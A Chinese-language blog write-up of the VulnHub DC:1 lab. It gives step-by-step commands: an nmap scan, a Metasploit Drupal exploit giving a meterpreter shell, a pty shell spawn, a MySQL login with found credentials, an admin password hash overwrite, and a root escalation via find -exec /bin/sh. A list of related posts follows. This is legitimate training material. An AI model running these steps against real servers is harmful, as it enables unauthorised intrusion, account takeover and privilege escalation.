vulnhub-DC:1靶机渗透记录
准备工作
在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-1,292/
导入到vmware
打开kali准备进行渗透(ip:192.168.200.6)
信息收集
利用nmap进行ip端口探测
nmap -sS 192.168.200.6/24
可以看到ip为192.168.200.12的主机开放了22、80、111端口,该主机为靶机DC:1。
开始渗透
开放了80端口意味着我们可以访问他的网站,先访问192.168.200.12:80看看什么情况
是一个登陆的界面,尝试了admin等弱口令后没有结果,暂时找不到其他渗透点,只能先用dirsearch扫一遍
python3 dirsearch.py -u http://192.168.200.12:80
但是没有什么有用的信息,尝试抓包后也没有注意到什么注入点,只能看看有没有框架的漏洞
利用wappalyzer插件来查看这个网站的cms
查到cms是Drupal
接着用msf查看一下有没有关于这个cms的漏洞
在终端输入msfconsole打开msf
search一下关于drupal的漏洞
search drupal
在尝试了几个攻击模块后,发现只有第四个漏洞可以利用
use 4
set RHOSTS 192.168.200.12
run
成功连接,得到meterpreter会话
拿到shell
用ls命令查看当前的文件
注意到有一个flag1.txt文件 cat flag1.txt 查看一下里面的内容
拿到flag1
flag1给了一个小提示,翻译过来就是"每一个好的CMS都需要一个配置文件-你也是。"
那就去查看一下配置文件
Drupal的配置文件是网站根目录下的/sites/defaultx下的setting.php文件。
cd到sites 再cd到defaultx 再cat settings.php
看到了flag2以及数据库的账号密码
这里flag2也给了提示,翻译过来就是
暴力和字典攻击不是最好的选择
获得访问权限的唯一方法(您将需要访问权限)。
你能用这些证书做什么
先尝试登陆一下数据库
mysql -u dbuser -pR0ck3t
连接成功,但是却无论输入什么都没有回显,应该是权限不足,目标主机限制了访问权限
从这开始就涉及到我的知识盲区了,目前为止我还没有学习相关的提权方法,只能跟着网上的一些文章一步步来,也当是一个初次尝试提权
权限提升
使用python 通过pty.spawn()获得交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
连接数据库
mysql -u dbuser -pR0ck3t
进入数据库后先查看一下数据库
show databases;
再进入drupaldb数据库查看他的表
use drupaldb;
show tables;
注意到名为user的表,查看一下
select * from user;
找到了登陆的账号密码,密码不知道是什么加密方法,
使用Drupal对数据库的加密方法,加密脚本位置在网站根目录下的scripts下
回到根目录执行 password-hash.sh 文件进行加密(这里不能在scripts目录下进行,否则会报错)
php ./scripts/password-hash.sh admin
将admin加密后得到的是$S$DJkC7CVBb0dIx0ySitpfjUZyZ8rioKgogBsDSvpAZHOvUy1p4rq1
得到了加密后的密码,就可以进入数据库修改密码啦
update users set pass='$S$DJkC7CVBb0dIx0ySitpfjUZyZ8rioKgogBsDSvpAZHOvUy1p4rq1' where name='admin';
回到开始的网站上用刚刚的账户密码admin:admin 登陆进去
在后台找到了flag3文件
打开flag3文件又得到一个提示
提示找到passwd文件
passwd文件在etc中
这里找到了flag4的路径在 /home/flag4中
得到flag4
使用find命令提权,root。
find ./ aaa -exec '/bin/sh' \;
进入root根目录找到最终的flag
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
参考文章
https://www.cnblogs.com/Gh0st1nTheShell/p/14842221.html
https://www.freesion.com/article/1909443385/
vulnhub-DC:1靶机渗透记录的更多相关文章
- vulnhub-DC:2靶机渗透记录
准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-2,311/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...
- vulnhub-DC:5靶机渗透记录
准备工作 在vulnhub官网下载DC:5靶机DC: 5 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...
- vulnhub-DC:6靶机渗透记录
准备工作 在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...
- vulnhub-DC:3靶机渗透记录
准备工作 在vulnhub官网下载DC:1靶机www.vulnhub.com/entry/dc-3,312/ 导入到vmware 导入的时候遇到一个问题 解决方法: 点 "虚拟机" ...
- vulnhub-DC:4靶机渗透记录
准备工作 在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/ 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:19 ...
- vulnhub-DC:7靶机渗透记录
准备工作 在vulnhub官网下载DC:7靶机DC: 7 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 已经知道了靶 ...
- vulnhub-DC:8靶机渗透记录
准备工作 在vulnhub官网下载DC:8靶机DC: 8 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...
- vulnhub-XXE靶机渗透记录
准备工作 在vulnhub官网下载xxe靶机 导入虚拟机 开始进行渗透测试 信息收集 首先打开kali,设置成NAT模式 查看本机ip地址 利用端口扫描工具nmap进行探测扫描 nmap -sS 19 ...
- DC 1-3 靶机渗透
DC-1靶机 端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口. 发现是Drupal框架. 进行目录的扫描: 发现admin被禁止 ...
随机推荐
- 【Android编程】android平台的MITM瑞士军刀_cSploit源码解析及中间人攻击复现
/文章作者:Kali_MG1937 作者博客ID:ALDYS4 QQ:3496925334 未经允许,禁止转载/ 何为MITM欺骗,顾名思义,中间人攻击的含义即为在局域网中充当数据包交换中间人的角色 ...
- 【SQLite】教程02-SQLite命令
获取帮助 sqlite> .help 获得以下帮助: 命令 描述 .backup ?DB? FILE 备份 DB 数据库(默认是 "main")到 FILE 文件. .bai ...
- ConcurrentSkipListSet - 秒懂
疯狂创客圈 经典图书 : <Netty Zookeeper Redis 高并发实战> 面试必备 + 面试必备 + 面试必备 [博客园总入口 ] 疯狂创客圈 经典图书 : <Sprin ...
- 「10.15」梦境(贪心)·玩具(神仙DP)·飘雪圣域(主席树\树状数组\莫队)
A. 梦境 没啥可说的原题.... 贪心题的常见套路我们坐标以左端点为第一关键字,右端点为第二关键字 然后对于每个转折点,我们现在将梦境中左端点比他小的区间放进$multiset$里 然后找最近的右端 ...
- 源码学习之noop
/** * Perform no operation. * Stubbing args to make Flow happy without leaving useless transpiled co ...
- 机器人路径规划其一 Dijkstra Algorithm【附动态图源码】
首先要说明的是,机器人路径规划与轨迹规划属于两个不同的概念,一般而言,轨迹规划针对的对象为机器人末端坐标系或者某个关节的位置速度加速度在时域的规划,常用的方法为多项式样条插值,梯形轨迹等等,而路径规划 ...
- 一个SQLServer中JSON文档型数据的查询问题
近日在项目中遇到一个问题: 如何在报表中统计JSON格式存储的数据? 例如有个调查问卷记录表,记录每个问题的答案. 其结构示意如下(横表设计) Id user date Q1_Answer Q2_An ...
- Drools规则引擎实践直白总结
目录 1. 创建Drools环境(引入Drools相关依赖包.现在都流行spring boot,故最简单有效的依赖才是最好的,kie-spring内部自行依赖了drools相关核心的依赖包) 2. 了 ...
- 什么是OSI的第7层
1.什么是Internet的第7层? 第7层是指Internet的7层OSI模型的顶层,也称为"应用程序层".这是数据处理的顶层,位于用户与之交互的软件应用程序的表面之下或幕后.例 ...
- .net core 支付宝,微信支付 三
支付回调: 获取HttpRequest的body内容,之前使用Request.Form有时候数据请求不到(可能是跟.net core 版本有关?) var s = HttpRequest.Body; ...